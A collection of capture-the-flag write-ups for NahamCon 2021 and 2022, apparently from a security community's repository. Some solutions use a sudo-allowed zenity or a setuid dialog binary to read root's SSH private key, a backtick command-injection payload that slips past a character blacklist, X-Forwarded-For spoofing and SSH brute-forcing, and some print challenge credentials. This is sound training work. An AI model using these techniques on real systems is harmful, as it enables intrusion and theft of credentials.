5 | After googling “eight circle of hell cipher” we find something called Malbolge, a programming language.
6 | We use a decoder for it and we get the
7 |
8 | https://malbolge.doleczek.pl/
9 |
10 |
11 | ```
12 | flag - flag{bf201f669b8c4adf8b91f09165ec8c5c}
13 | ```
14 |
15 | ----------
16 |
17 | ## Prison Break
18 |
19 | ```
20 | cat /just/out/of/reach/twh.txt -> No such file or directory i.e. real cat error
21 | ```
22 |
23 | but if you try
24 |
25 | ```
26 | cat /just/out/of/reach/flag.txt -> error changes into a custom one
27 | ```
28 |
29 | script is detecting the keyword `flag`
30 |
31 | 
32 |
33 | ----------
34 |
35 | ## Zenith
36 |
37 | * Goal was to privesc to root and get the flag from root directory
38 |
39 | * detecting privesc was easy because all i had to do was `sudo -l`
40 |
41 | * we can execute `zenity` with sudo without password
42 |
43 | * zenity is an application which generates GUI pop ups.
44 |
45 | * but we have ssh, a simple workaround for this is to use `-X` commandline option of ssh which forwards gui applications to our machine, so using this we can execute zenity on remote server and popups will appear on our machine.
46 |
47 | * now after reading manpage of zenity few times this command worked
48 |
49 | ```
50 | zenity --text-info --filename "/root/.ssh/id_rsa"
51 | ```
52 |
53 | 
54 |
55 | * and a pop up appears with private key of root <3
56 |
57 | 
58 |
--------------------------------------------------------------------------------
/nahamcon_2021/misc/PrisonBreak.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | Prison Break Writeup
4 | desc: Check out our writeup for Prison Break for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: misc
9 | challenge: Prison Break
10 | tags: "misc, jail, escape"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | ```
18 | cat /just/out/of/reach/twh.txt -> No such file or directory i.e. real cat error
19 | ```
20 |
21 | but if you try
22 |
23 | ```
24 | cat /just/out/of/reach/flag.txt -> error changes into a custom one
25 | ```
26 |
27 | script is detecting the keyword `flag`
28 |
29 | 
30 |
31 |
--------------------------------------------------------------------------------
/nahamcon_2021/misc/Zenith.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | Zenith Writeup
4 | desc: Check out our writeup for Zenith for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: misc
9 | challenge: Zenith
10 | tags: "misc, privesc, lpe, zenity"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | * Goal was to privesc to root and get the flag from root directory
18 |
19 | * detecting privesc was easy because all i had to do was `sudo -l`
20 |
21 | * we can execute `zenity` with sudo without password
22 |
23 | * zenity is an application which generates GUI pop ups.
24 |
25 | * but we have ssh, a simple workaround for this is to use `-X` commandline option of ssh which forwards gui applications to our machine, so using this we can execute zenity on remote server and popups will appear on our machine.
26 |
27 | * now after reading manpage of zenity few times this command worked
28 |
29 | ```
30 | zenity --text-info --filename "/root/.ssh/id_rsa"
31 | ```
32 |
33 | 
34 |
35 | * and a pop up appears with private key of root <3
36 |
37 | 
38 |
--------------------------------------------------------------------------------
/nahamcon_2021/misc/eighthcircle.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | eighth_circle Writeup
4 | desc: Check out our writeup for eighth_circle for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: misc
9 | challenge: eighth_circle
10 | tags: "misc"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | After googling “eight circle of hell cipher” we find something called Malbolge, a programming language.
18 | We use a decoder for it and we get the
19 |
20 | https://malbolge.doleczek.pl/
21 |
22 |
23 | ```
24 | flag - flag{bf201f669b8c4adf8b91f09165ec8c5c}
25 | ```
26 |
27 |
--------------------------------------------------------------------------------
/nahamcon_2021/mission/Bionic.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | Bionic Writeup
4 | desc: Check out our writeup for Bionic for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: mission
9 | challenge: Bionic
10 | tags: "web"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | flag is in https://constellations.page/robots.txt
18 |
19 | next target url : https://constellations.page/meet-the-team.html
20 |
21 | source page mentions `VELA`, with the following context
22 | ```
23 | Vela, can we please stop sharing our version control software out on the public internet
24 | ```
25 |
26 |
--------------------------------------------------------------------------------
/nahamcon_2021/mission/Gus.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | Gus Writeup
4 | desc: Check out our writeup for Gus for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: mission
9 | challenge: Gus
10 | tags: "osint"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | https://github.com/gusrodry/development/blob/master/config/.ssh/flag.txt
18 |
19 | **along with the gus flag here we also get ssh private and public keys!**
20 |
21 | **in the public key we can see “john@xps15”**
22 |
23 |
--------------------------------------------------------------------------------
/nahamcon_2021/mission/Hydraulic.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | Hydraulic Writeup
4 | desc: Check out our writeup for Hydraulic for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: mission
9 | challenge: Hydraulic
10 | tags: "misc"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | This one was straight forward, we dont know the username and we dont know the password, we just had to bruteforce
18 |
19 | 
20 |
21 | ssh login and cat flag.txt
22 |
23 |
--------------------------------------------------------------------------------
/nahamcon_2021/mission/Leo.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | Leo Writeup
4 | desc: Check out our writeup for Leo for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: mission
9 | challenge: Leo
10 | tags: "web, git"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | Directory search on https://constellations.page reveals `/.git/` directory
18 |
19 | we dont have access to this repository because its not public on github so we can use a nice tool to dump directly from the website!
20 |
21 | https://github.com/internetwache/GitTools
22 |
23 | then if we check `git log` we can see full name of leo
24 |
25 | 
26 |
27 | Instagram : `@_leorison`
28 |
29 | there is a QR Code in one of the images
30 |
31 | ```
32 | flag{636db5f4f0e36908a4f1a4edc5b0676e}
33 |
34 | A password for Leo is constelleorising
35 | ```
36 |
37 | we found flag and another creds!
38 |
39 |
--------------------------------------------------------------------------------
/nahamcon_2021/mission/LyraandOrion.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | Lyra and Orion Writeup
4 | desc: Check out our writeup for Lyra and Orion for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: mission
9 | challenge: Lyra and Orion
10 | tags: "web, git, osint"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | if we check the “meet the team” commit we can see names of all employees!
18 |
19 | ```
20 | git show 4c88ac1c56fe228267cf415c3ef87d7c3b8abd60
21 | ```
22 |
23 | 
24 |
25 | ```
26 | Orion Morra
27 | Lyra Patte
28 | Gemini Coley
29 | Vela Leray
30 | Pavo Welly
31 | ```
32 |
33 | On twitter we can find Lyra’s profile : https://twitter.com/LyraPatte/with_replies
34 |
35 | and she has linked one of the website links : https://constellations.page/constellations-documents/1/
36 |
37 | `/1/` lets try more…on `/5/`
38 |
39 | 
40 |
41 | Once again on twitter we can find orion at : https://twitter.com/OrionMorra/with_replies
42 |
43 | he has posted two useful pictures
44 |
45 | https://twitter.com/OrionMorra/status/1363789936219082756/
46 |
47 | AND
48 |
49 | https://twitter.com/OrionMorra/status/1370730836736274433/
50 |
51 |
52 | ```
53 | flag{0bcffb17cbcbf4359a42ec45d0ccaf2
54 | ```
55 |
56 | ```
57 | orion:stars4love4life
58 | ```
59 |
60 | another set of creds
61 |
62 |
--------------------------------------------------------------------------------
/nahamcon_2021/mission/MeetTheTeam.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | Meet The Team Writeup
4 | desc: Check out our writeup for Meet The Team for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: mission
9 | challenge: Meet The Team
10 | tags: "osint"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | flag is in a tweet on the twitter linked above
18 |
19 |
--------------------------------------------------------------------------------
/nahamcon_2021/mission/RECON.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | RECON Writeup
4 | desc: Check out our writeup for RECON for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: mission
9 | challenge: RECON
10 | tags: "osint"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | Github : https://github.com/constellations-git
18 |
19 | Twitter : https://twitter.com/C0NST3LLAT10NS
20 |
21 | there are 0 public repositories but there is one member :
22 |
23 | https://github.com/gusrodry
24 |
25 | in his followers list there is another account related to constellation
26 |
27 | hercules : https://github.com/HerculesScox
28 |
29 | in his account there is one repo created by him which is interesting
30 |
31 | repo : https://github.com/HerculesScox/maintenance
32 |
33 | website mentions “YouTube” and “Podcast” but both are not linked!
34 |
35 | Email for hercules : herculesscoxland@yahoo.com
36 |
37 | https://githubmemory.com/@HerculesScox
38 |
39 |
--------------------------------------------------------------------------------
/nahamcon_2021/mission/hercules.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | hercules Writeup
4 | desc: Check out our writeup for hercules for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: mission
9 | challenge: hercules
10 | tags: "osint"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | flag is in “connect.sh” in his repo : https://github.com/HerculesScox/maintenance/blob/main/connect.sh
18 |
19 | along with the flag we can also see he that he used “sshpass” in this file, sshpass is a program used to auto login into ssh by supplying the password in command line instead of manually entering it everytime
20 |
21 | ```
22 | hercules:starstruckherc
23 | ```
24 |
25 | with these credentials we can SSH into DEGRADE challenge!
26 |
27 |
--------------------------------------------------------------------------------
/nahamcon_2021/osint.md:
--------------------------------------------------------------------------------
1 | # OSINT
2 |
3 | ## intigriti Sponsor
4 |
5 | https://app.intigriti.com/researcher/programs/intigriti/nahamcon2021ctf/detail
6 |
7 | found this which has the following:
8 |
9 | 
10 |
11 | the two links do not work so we shall try deciphering this using :
12 |
13 | https://enkhee-osiris.github.io/Decoder-JSFuck/
14 |
15 | but we got an error stating about an illegal character
16 |
17 | https://stackoverflow.com/questions/35657620/illegal-character-error-u200b
18 |
19 | solution to this was easy as we just opened the challenge text in VSCode and found the `zero width space` character and removed it and the decoder now works!
20 |
21 | ----------
22 |
23 | ## INE Sponsor
24 |
25 | Source code analysis on the link provided in the challenge
26 |
27 | 
28 |
29 | ----------
30 |
31 | ## Google Play Sponsor
32 |
33 | Head over to : https://www.google.com/about/appsecurity/play-rewards/
34 |
35 | look for a PDF link under “Theft of Sensitive Data”
36 |
37 | Download : https://www.google.com/about/appsecurity/play-rewards/Android_app_vulnerability_classes.pdf
38 |
39 | Search for “flag{“ in the pdf, its invisible on page 17!
40 |
41 | 
42 |
--------------------------------------------------------------------------------
/nahamcon_2021/osint/GooglePlaySponsor.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | Google Play Sponsor Writeup
4 | desc: Check out our writeup for Google Play Sponsor for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: osint
9 | challenge: Google Play Sponsor
10 | tags: "osint"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | Head over to : https://www.google.com/about/appsecurity/play-rewards/
18 |
19 | look for a PDF link under “Theft of Sensitive Data”
20 |
21 | Download : https://www.google.com/about/appsecurity/play-rewards/Android_app_vulnerability_classes.pdf
22 |
23 | Search for “flag{“ in the pdf, its invisible on page 17!
24 |
25 | 
26 |
--------------------------------------------------------------------------------
/nahamcon_2021/osint/INESponsor.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | INE Sponsor Writeup
4 | desc: Check out our writeup for INE Sponsor for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: osint
9 | challenge: INE Sponsor
10 | tags: "osint"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | Source code analysis on the link provided in the challenge
18 |
19 | 
20 |
21 |
--------------------------------------------------------------------------------
/nahamcon_2021/osint/intigritiSponsor.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | intigriti Sponsor Writeup
4 | desc: Check out our writeup for intigriti Sponsor for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: osint
9 | challenge: intigriti Sponsor
10 | tags: "osint"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | https://app.intigriti.com/researcher/programs/intigriti/nahamcon2021ctf/detail
18 |
19 | found this which has the following:
20 |
21 | 
22 |
23 | the two links do not work so we shall try deciphering this using :
24 |
25 | https://enkhee-osiris.github.io/Decoder-JSFuck/
26 |
27 | but we got an error stating about an illegal character
28 |
29 | https://stackoverflow.com/questions/35657620/illegal-character-error-u200b
30 |
31 | solution to this was easy as we just opened the challenge text in VSCode and found the `zero width space` character and removed it and the decoder now works!
32 |
33 |
--------------------------------------------------------------------------------
/nahamcon_2021/stego.md:
--------------------------------------------------------------------------------
1 | # Steganography
2 |
3 | ## Shoelaces
4 |
5 | simple strings will get the flag.
6 |
7 | ----------
8 |
9 | ## Pollex
10 |
11 | ```
12 | binwalk --dd='.*' pollex
13 | ```
14 | now in the _pollex.extracted/ there is an image with the flag on it.
15 |
16 |
--------------------------------------------------------------------------------
/nahamcon_2021/stego/Pollex.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | Pollex Writeup
4 | desc: Check out our writeup for Pollex for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: stego
9 | challenge: Pollex
10 | tags: "stegano"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | ```
18 | binwalk --dd='.*' pollex
19 | ```
20 | now in the _pollex.extracted/ there is an image with the flag on it.
21 |
22 |
--------------------------------------------------------------------------------
/nahamcon_2021/stego/Shoelaces.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | Shoelaces Writeup
4 | desc: Check out our writeup for Shoelaces for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: stego
9 | challenge: Shoelaces
10 | tags: "stegano"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | simple strings will get the flag.
18 |
19 |
--------------------------------------------------------------------------------
/nahamcon_2021/twc_nahamcon_cert.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thewhitecircle/ctf_writeups/28b263d522098954f59d1f075283320cf70d8131/nahamcon_2021/twc_nahamcon_cert.png
--------------------------------------------------------------------------------
/nahamcon_2021/web.md:
--------------------------------------------------------------------------------
1 | # web
2 |
3 | ## $Echo
4 |
5 | It is simple command injection
6 | in the input box we can use ` characters
7 |
8 | ```
9 | `id`
10 | ```
11 |
12 | all commands have to be enclosed in `` chars
13 |
14 | now if we list files using
15 | ```
16 | `ls`
17 | ```
18 | we can see `index.php` when we
19 | ```
20 | `cat index.php`
21 | ```
22 | we can see the code!
23 | certain characters are `blacklisted` we can only enter command less that `15` chars
24 | but there is no `flag.txt` here, if we simply execute
25 | ```
26 | `ls ../`
27 | ```
28 | then we can see flag.txt
29 | ```
30 | `cat ../flag.txt`
31 | ```
32 | fails because length of payload exceeds 15
33 |
34 | payload to get flag :
35 |
36 | **linux redirection character! `<` is NOT blacklisted!**
37 | ```
38 | `< ../flag.txt`
39 | ```
40 |
41 | ----------
42 |
43 | ## Homeward Bound
44 |
45 | In this challenge we were supposed to access internal files by spoofing client IP address, this can be done using `X-Forwarded-For` header
46 |
47 | ```
48 | $ curl -H “X-Forwarded-For: 127.0.0.1” http://challenge.nahamcon.com:31428/
49 | ```
50 |
--------------------------------------------------------------------------------
/nahamcon_2021/web/Echo.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | $Echo Writeup
4 | desc: Check out our writeup for $Echo for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: web
9 | challenge: $Echo
10 | tags: "web, rce"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | It is simple command injection
18 | in the input box we can use ` characters
19 |
20 | ```
21 | `id`
22 | ```
23 |
24 | all commands have to be enclosed in `` chars
25 |
26 | now if we list files using
27 | ```
28 | `ls`
29 | ```
30 | we can see `index.php` when we
31 | ```
32 | `cat index.php`
33 | ```
34 | we can see the code!
35 | certain characters are `blacklisted` we can only enter command less that `15` chars
36 | but there is no `flag.txt` here, if we simply execute
37 | ```
38 | `ls ../`
39 | ```
40 | then we can see flag.txt
41 | ```
42 | `cat ../flag.txt`
43 | ```
44 | fails because length of payload exceeds 15
45 |
46 | payload to get flag :
47 |
48 | **linux redirection character! `<` is NOT blacklisted!**
49 | ```
50 | `< ../flag.txt`
51 | ```
52 |
53 |
--------------------------------------------------------------------------------
/nahamcon_2021/web/HomewardBound.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | Homeward Bound Writeup
4 | desc: Check out our writeup for Homeward Bound for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: web
9 | challenge: Homeward Bound
10 | tags: "web"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | In this challenge we were supposed to access internal files by spoofing client IP address, this can be done using `X-Forwarded-For` header
18 |
19 | ```
20 | $ curl -H “X-Forwarded-For: 127.0.0.1” http://challenge.nahamcon.com:31428/
21 | ```
22 |
--------------------------------------------------------------------------------
/nahamcon_2022/README.md:
--------------------------------------------------------------------------------
1 | # NahamCon CTF 2022
2 |
3 | ## WriteUps
4 |
5 | We have added all the challenges we were able to solve, this is not a complete list.
6 |
7 | * [Cryptography](crypto.md)
8 | * [Keeber Security](keeber_security.md)
9 | * [Misc](misc.md)
10 | * [Mobile](mobile.md)
11 | * [Pwn](pwn.md)
12 | * [Warmups](warmups.md)
13 | * [Web](web.md)
--------------------------------------------------------------------------------
/nahamcon_2022/index.html:
--------------------------------------------------------------------------------
1 | ---
2 | layout: ctf_page
3 | title: The White Circle | CTF Writeups | Nahamcon 2022
4 | desc: "The White Circle is a community for Cyber/Information Security students, enthusiasts and professionals. You can discuss anything related to Security, share your knowledge with others, get help when you need it and proceed further in your journey with amazing people from all over the world."
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2022
7 | ---
--------------------------------------------------------------------------------
/nahamcon_2022/keeber_security/Keeber1.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2022 | Keeber 1 Writeup
4 | desc: Check out our writeup for Keeber 1 for Nahamcon 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2022
7 | parent: nahamcon_2022
8 | category: keeber_security
9 | challenge: Keeber 1
10 | tags: "osint, starry"
11 | date: 2022-05-03T00:00:00+00:00
12 | last_modified_at: 2022-05-03T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Starry-Lord
17 |
18 | 
19 |
20 | By searching for keeber security group on google we quickly found a valid domain at keebersecuritygroup.com, then finding the registrant name online gave the flag.
21 |
22 | 
23 |
24 |
--------------------------------------------------------------------------------
/nahamcon_2022/keeber_security/Keeber2.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2022 | Keeber 2 Writeup
4 | desc: Check out our writeup for Keeber 2 for Nahamcon 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2022
7 | parent: nahamcon_2022
8 | category: keeber_security
9 | challenge: Keeber 2
10 | tags: "osint, starry"
11 | date: 2022-05-03T00:00:00+00:00
12 | last_modified_at: 2022-05-03T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Starry-Lord
17 |
18 | 
19 |
20 | We can check for past versions of most website, and we find they fired Tiffany Douglas:
21 |
22 | 
23 |
24 |
--------------------------------------------------------------------------------
/nahamcon_2022/keeber_security/Keeber3.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2022 | Keeber 3 Writeup
4 | desc: Check out our writeup for Keeber 3 for Nahamcon 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2022
7 | parent: nahamcon_2022
8 | category: keeber_security
9 | challenge: Keeber 3
10 | tags: "osint, starry, web"
11 | date: 2022-05-03T00:00:00+00:00
12 | last_modified_at: 2022-05-03T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Starry-Lord
17 |
18 | 
19 |
20 | Here is their github:
21 |
22 | https://github.com/keebersecuritygroup
23 |
24 | https://github.com/keebersecuritygroup/security-evaluation-workflow/commit/e76da63337cfabb12ea127af3f86168e9dd08428
25 |
26 |
27 | We can see at this point in time a file called asana_secret.txt was uploaded to the github by mistake, Tiffany made a typo in the .gitignore file which ended up preventing asana_secret.tx from being commited (which doesn’t exist).
28 | Looking up Asana, I read we can query other users e-mails if we invite them to a group we create. It didn’t help us here but still noticeable detail.
29 | Researching more on asana, I discovered it has an API which allows to get information back with the right Authorization Header.
30 |
31 | 
32 |
33 |
--------------------------------------------------------------------------------
/nahamcon_2022/keeber_security/Keeber5.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2022 | Keeber 5 Writeup
4 | desc: Check out our writeup for Keeber 5 for Nahamcon 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2022
7 | parent: nahamcon_2022
8 | category: keeber_security
9 | challenge: Keeber 5
10 | tags: "osint, starry"
11 | date: 2022-05-03T00:00:00+00:00
12 | last_modified_at: 2022-05-03T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Starry-Lord
17 |
18 | 
19 |
20 | Clone the repository /security-evaluation-workflow/ and check commit logs.
21 |
22 | 
23 |
24 | ```
25 | email: tif.hearts.science@gmail.com
26 | ```
27 |
28 |
--------------------------------------------------------------------------------
/nahamcon_2022/keeber_security/Keeber6.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2022 | Keeber 6 Writeup
4 | desc: Check out our writeup for Keeber 6 for Nahamcon 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2022
7 | parent: nahamcon_2022
8 | category: keeber_security
9 | challenge: Keeber 6
10 | tags: "osint, starry"
11 | date: 2022-05-03T00:00:00+00:00
12 | last_modified_at: 2022-05-03T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Starry-Lord
17 |
18 | 
19 |
20 | Lost a piece of my soul and made a yelp account, to look for reviews by e-mail.
21 |
22 | 
23 |
24 |
--------------------------------------------------------------------------------
/nahamcon_2022/keeber_security/Keeber7.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2022 | Keeber 7 Writeup
4 | desc: Check out our writeup for Keeber 7 for Nahamcon 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2022
7 | parent: nahamcon_2022
8 | category: keeber_security
9 | challenge: Keeber 7
10 | tags: "osint, starry"
11 | date: 2022-05-03T00:00:00+00:00
12 | last_modified_at: 2022-05-03T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved too late by: Starry-Lord
17 |
18 | 
19 |
20 | 
21 |
22 | ```
23 | e-mail: cheerios.fanatic1941@gmail.com
24 | ```
25 |
26 | https://seon.io/resources/the-ultimate-guide-to-free-email-lookup-and-reverse-email-lookup-tools/
27 |
28 |
29 | This online tool showed a mention about myspace, so I sacrificed another bit of my soul and made a MySpace account. This allows us to find the flag and a new username:
30 |
31 |
32 | 
33 |
34 |
--------------------------------------------------------------------------------
/nahamcon_2022/keeber_security/Keeber8.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2022 | Keeber 8 Writeup
4 | desc: Check out our writeup for Keeber 8 for Nahamcon 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2022
7 | parent: nahamcon_2022
8 | category: keeber_security
9 | challenge: Keeber 8
10 | tags: "osint, starry"
11 | date: 2022-05-03T00:00:00+00:00
12 | last_modified_at: 2022-05-03T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved too late by: Starry-Lord
17 |
18 | 
19 |
20 | ```
21 | myspace username: cereal_lover1990
22 | ```
23 |
24 | A quick search for the username with another [online tool](https://instantusername.com) reveals a matching user on pastebin.com:
25 |
26 |
27 | ```
28 | https://pastebin.com/u/cereal_lover1990
29 | ```
30 |
31 | 
32 |
33 | content of Chump List:
34 |
35 | 
--------------------------------------------------------------------------------
/nahamcon_2022/misc/Gossip.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2022 | Gossip Writeup
4 | desc: Check out our writeup for Gossip for Nahamcon 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2022
7 | parent: nahamcon_2022
8 | category: misc
9 | challenge: Gossip
10 | tags: "misc, starry, taz, legend, twh, cve, lpe, privesc"
11 | date: 2022-05-03T00:00:00+00:00
12 | last_modified_at: 2022-05-03T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : Starry-Lord, Taz, Legend, thewhiteh4t
17 |
18 | This one involved an ssh connection to a Linux machine. We could find kubernetes secrets in the usual /run/secrets/kubernetes.io/serviceaccount which revealed it was a kubernetes container.
19 | After a bit of enumeration I learned about CVE-2022-0185 which allows us to escape the container, but it looked like it had been patched.
20 |
21 | Further enumeration led me to find a few sticky bits on some of the binaries in /usr/bin. I looked them up to find a fitting one called dialog, which will allow us to read files with elevated permissions:
22 |
23 | ```
24 | user@gossip-9d9e950dfdcbda12-64cdd78676-psbqk:/usr/bin$ ls -la dialog
25 | -rwsr-sr-x 1 root root 260736 Jan 3 23:30 dialog
26 | ```
27 |
28 | 
29 |
30 | After a bit of cleaning up we can use this key to login as root.
31 |
32 |
33 | 
34 |
35 |
--------------------------------------------------------------------------------
/nahamcon_2022/misc/SteamLocomotive.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2022 | Steam Locomotive Writeup
4 | desc: Check out our writeup for Steam Locomotive for Nahamcon 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
